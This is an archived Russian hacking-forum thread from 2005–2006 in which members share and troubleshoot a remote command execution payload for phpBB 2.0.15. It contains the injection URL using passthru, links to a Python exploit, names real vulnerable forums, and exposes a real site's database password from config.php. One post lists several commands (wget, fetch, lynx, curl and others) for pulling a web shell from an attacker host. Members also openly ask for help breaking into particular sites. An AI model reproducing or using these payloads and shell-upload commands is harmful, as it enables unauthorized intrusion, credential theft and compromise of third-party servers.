PDA

Просмотр полной версии : Эксплоит для phpbb 2.0.15


KLez
30.06.2005, 17:30
Вот вам сплоит . Ждите видео
http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'

m0nzt3r
30.06.2005, 23:39
нифига себе щас попробуем!))

m0nzt3r
30.06.2005, 23:48
чето не работает сплойт((

KLez
01.07.2005, 11:39
Сам ты не работаешь все пашет бери после viewtopic.php?t=243

-artik-
01.07.2005, 12:34
а у меня вот что отвечает - "Темы, которую вы запросили, не существует"....
В чем моя ошибка?

coyl
01.07.2005, 13:45
надо с запросе подставить t=номер существующей темы

KLez
01.07.2005, 14:01
а вы что делайте разви почле него не сушествуюший темы не надо тыкать НАРОД сначала зайдите на тему . Бага на других версия не пашет я вчера проверил=((

Manoz
01.07.2005, 14:23
Не работает... Вот к примеру: http://webportal.kpiservice.com.ua/forum/viewtopic.php?t=45

KLez
01.07.2005, 15:10
ХЗ братцы у меня тоже не на всех пашет сплоит

Xalegi
01.07.2005, 17:32
всё нормально работает, тока вот искать нужно бажный форум.. берёте и любой форум.. открываете топ, где ОДНО СООБЩЕНИЕ (тогда будет всего ОДНО повторение выполненяемой команды...) и вставляем после номера виевтопика:
&highlight='.passthru($HTTP_GET_VARS[cmd]).'&cmd=id

и работаем =))) кстати через поиск в яндексе есть несколько форумов бажных =)) исчите =)) (ЗЫ: всего-то там 4 страницы)...

кстати.. 70% в 15-ой верссии внизу где powered номер версии форума не указывается.. а пишется 2002-2005 =)) нада искать =)

vorishka
01.07.2005, 20:16
Ну вот сломал. И что дальше. config.php украл. толку от него маловато... Подскажите... Как может хэш админа или БД скомуниздить?

m0nzt3r
01.07.2005, 23:55
а залить ремвиев не можешь??КЛез нееее я работаю)))

dinar_007
02.07.2005, 01:09
http://www.tavernaclub.com/viewtopic.php?t=54218
ВОТ ТУТ ПРОКАТЫВАЕТ )))

tester2005
02.07.2005, 01:22
Сплойт на Python,
http://www.security.nnov.ru/files/phpbbex.py

vorishka
02.07.2005, 14:59
Ну а как его заливать? Какие нада права у папки? Я не нашел rwx-rwx-rwx.... Или может ещё какие нада права, что б выполнялся скрипт и я мог его залить... А то ничерта не могу...

temon
02.07.2005, 20:26
помогите пожалуйчста, вот я вставил как надо, прокатило вроде, мне выдался списовк файлов и больше ничего, конфига нету, паролей к базе данных всмысле.

vorishka
02.07.2005, 21:45
temon ты эта: config.php открой посмотри в HTML коде =))) Прокатит...
Повторяю свой вопрс: Какие нада права у папки? Я не нашел rwx-rwx-rwx.... Или может ещё какие нада права, что б выполнялся скрипт и я мог его залить... А то ничерта не могу...

m0nzt3r
02.07.2005, 23:20
про права я не помню эти буковки))попробуй в images или tmp, да и вобще дай ссылку....динар по этой ссылке говорит что нету такой темы..

k00mar.bzz[SnK]
03.07.2005, 01:34
Прописал я сплойт и сообщение которое было в это теме пменялось на:
pan style="font-weight: bold"a href="http://www.ww2.ru" target="_blank" class="postlink"/a/spana href="http://www.ww2.ru" target="_blank"/aspan style="font-weight: bold"/spana href="http://www.ww2.ru/category.php?id=12" target="_blank" class="postlink"/aa href="http://www.ww2.ru/category.php?id=26" target="_blank" class="postlink"/aa href="http://www.ww2.ru/category.php?id=11" target="_blank" class="postlink"/aa href="http://www.ww2.ru/category.php?id=13" target="_blank" class="postlink"/aa href="http://www.ww2.ru/category.php?id=34" target="_blank" class="postlink"/aspan style="font-weight: bold"a href="http://www.ww2.ru" target="_blank" class="postlink"/a/spa
больше не чего не произошло :(
Мож я что делаю не так ?

bul666
03.07.2005, 02:11
Плчему никто видео не снимет?

dinar_007
03.07.2005, 02:14
про права я не помню эти буковки))попробуй в images или tmp, да и вобще дай ссылку....динар по этой ссылке говорит что нету такой темы..

Попробуй другой топик открыть

dinar_007
03.07.2005, 02:37
На некоторых форумах выдаётся вот такая штука!!!
Fatal error: Call to undefined function phpbb_rtrim() in /pub/home/motorolk/motor/forum/viewtopic.php on line 498

Чё это такое?

dinar_007
03.07.2005, 03:09
http://soft.blend.ru/forum/viewtopic.php?t=123&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'

А чё дальше то делать?

Как шелл залить в форум ??? :confused:

tester2005
03.07.2005, 04:43
http://soft.blend.ru/forum/viewtopic.php?t=123&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'

А чё дальше то делать?

Как шелл залить в форум ??? :confused:

$dbms = 'mysql';

$dbhost = 'localhost';
$dbname = 'blend129_form';
$dbuser = 'blend129_form';
$dbpasswd = '109033';

S1on
03.07.2005, 05:02
Подскажите плиз, как спомощью вот этого (http://target/forum/viewtopic.php?t=536&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).')
можно залить файлы на сервак ?

Rebz
03.07.2005, 12:31
Ну есть масса способов..
можешь через exec() залить..
но проще узнать сначала БД (в файле конфига). Может логин и пасс и для фтп подойдут).

S1on
03.07.2005, 13:40
Rebz, приведи для начинающих пример этой команды плизз

Rebz
03.07.2005, 14:29
Я немного не в ту степь пошёл.. =)
Попробуй wget-ом.. если он не поддерживается, то можно lynx-ом.
Синаксис такой:

lynx -source http://здесь_урл_шелла/shell.php>>1.php
после знака >> мы вводим название, которое будет на сайте служить вам шеллом. Также можно сразу указать др.путь, например, .... >>./images/1.php (ваш шелл будет записан в папку images).
Ну и т.д. по аналогии...

temon
03.07.2005, 17:53
temon ты эта: config.php открой посмотри в HTML коде =))) Прокатит...
Повторяю свой вопрс: Какие нада права у папки? Я не нашел rwx-rwx-rwx.... Или может ещё какие нада права, что б выполнялся скрипт и я мог его залить... А то ничерта не могу...
как его открыть подробнее пожалуйста напиши.

-artik-
04.07.2005, 07:33
Я тут новенький. У меня возникли вопросы что делать после того как я узнал пароль
к БД? и еще - эта уязвимость только к phpbb 2.0.15? (к прешедствующим версиям не идет?)

SK | Heaton
04.07.2005, 09:43
www.[target].ru/viewtopic.php?t=4&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'&cmd=id
выдает:

uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500что

дальше делать подскажите, Плизз

SanyaX
04.07.2005, 09:59
Команды Unix выучи потом поймешь =))).

SanyaX
04.07.2005, 10:02
Я даже видео снял вот что то его не публикуют =((((.

GreenBear
04.07.2005, 11:30
и правильно что не публикуют, Кез, молодец -)) не нужно там пол инета хакнутого... пройдет время и можно буит =)

SanyaX
04.07.2005, 11:58
Ну в чём то ты прав а в чём то нет. Пусть другой форум ставят о не этот с уязвимостью.

SK | Heaton
04.07.2005, 12:52
SanyaX, скинь на webfile.ru потом даш мне код =)) :D

SanyaX
04.07.2005, 13:32
На главной странице где коментарии там есть ссылка на експлойт с расширением php.

SK | Heaton
04.07.2005, 14:24
SanyaX, я имел виду видео который ты снял...

SanyaX
04.07.2005, 14:35
не знаю как отрагирует администрация от этого.

SK | Heaton
04.07.2005, 15:31
SanyaX, у тя типа получилось =))

SanyaX
04.07.2005, 18:41
Не понял что получилось?

DR@G
04.07.2005, 19:32
Форум хакнуть =))
Скинь нам видео с SK | Heaton'om на вебфайл и скажи пасс от него =))

SK | Heaton
05.07.2005, 07:28
Форум хакнуть =))
Скинь нам видео с SK | Heaton'om на вебфайл и скажи пасс от него =))

я уже вчера получил и просмотрел =)) у него почти получилось. Просто он не смог залить шелл.. Ну это уже кому как повезет с жертвой =))

m0nzt3r
05.07.2005, 13:18
слушайте а нах вам шелл заливать?кто качал последний выпуск езина от Мазы тот знает что там лежит измененный сплойт для пхпбб 2.0.15 и очень отлично работает и прост в управлении..

uboHEX
06.07.2005, 02:04
Народ, хоть тресни не могу понять как скачать или залить файл с\на сервер. Не могу составить запрос wget`ом. Помогите плиз.

mamont
06.07.2005, 02:40
хм я ощущаю себя маленькой собачкой которой показали вкусный кусок мяса а потом подвесили на прилачно расстоянии да так что мне до него не подпрыгнуть !!!=(

Вот сижу облизываюсь и хочу всех убить !!!!!!!!!!

SK | Heaton
06.07.2005, 08:17
mamont, но но !!!

KLez
06.07.2005, 10:54
2 mamont Ну что ты не понимаешь ТО??? Тебе дали сплоит вот и юзай .

mamont
07.07.2005, 01:58
вопервых я не могу создать для него среду по некоторым приченам =(
а биплатного шела вот неделю не могу найти чбы wget хотябы работал =(

может кто подскажет сайтик где халява на шелл ????

ProTeuS
07.07.2005, 02:27
дааа, с wget'ом траблемка-то вышла...у меня тоже не заработал :(

t4k
07.07.2005, 03:52
Так может там просто не wget стоит, а например feetch или curl? :)

Xalegi
07.07.2005, 10:31
верняк... сначала посмотрите какая качалка стоит.. потом права куда скачиваете.. и всё тип-топ =)

tester2005
08.07.2005, 03:53
Млииин ну вы даете, трудно почитать книжек, мануалов чтоль.......
Вот споссобы закачек, еси один не работает то заработает другой

метод wget:
wget http://attacker/shellfile -o /папка

метод fetch:
fetch -p http://attacker/shellfile -o /папка

метод lynx:
lynx -source http://attacker/shellfile > /папка

метод links:
links -source http://attacker/shellfile > /папка

метод curl:
curl http://attacker/shellfile -o /папка

метод GET:
GET http://attacker/shellfile > /папка

ph0en1x
01.07.2006, 06:34
Перепробовал все описаные способы нифига не получилось. :( может просто руки кривые.
Помогите взломать http://в просьбы о взломах/forum/.

Voyageur
01.07.2006, 11:11
ph0en1x, если судить по тесту на определение версии, то форум принадлежит к 2.0.19, а не 2.0.15. Тогда тебе в поиск, там был эксплоит, правда он даалееекоо не везде работает.
ЗЫ Если удастся взломать его - дай мне знать, сколько не бьюсь над 19-м - нифига не получается :(

bandera
01.07.2006, 13:41
Если удастся взломать его - дай мне знать, сколько не бьюсь над 19-м - нифига не получается :(А чо над ним биться то, всё равно ничего не получится. Ну только если у тебя есть логин и пасс админа или на форуме стоит мод смены стиля форума с главной страницы.

Есть два сплойта к 19.
Один: для выполнения команд если имеем логин и пасс админа.
Второй (наверное тот который ты имел ввиду): реализовать уязвимость можно только на форумах где стоит мод смены стиля форума с главной страницы (таких не очень много).

Voyageur
01.07.2006, 18:36
bandera, ну это я знаю. Там же вроде xss была? Не бывает такого, что взломать нельзя. Особенно у phpBB :)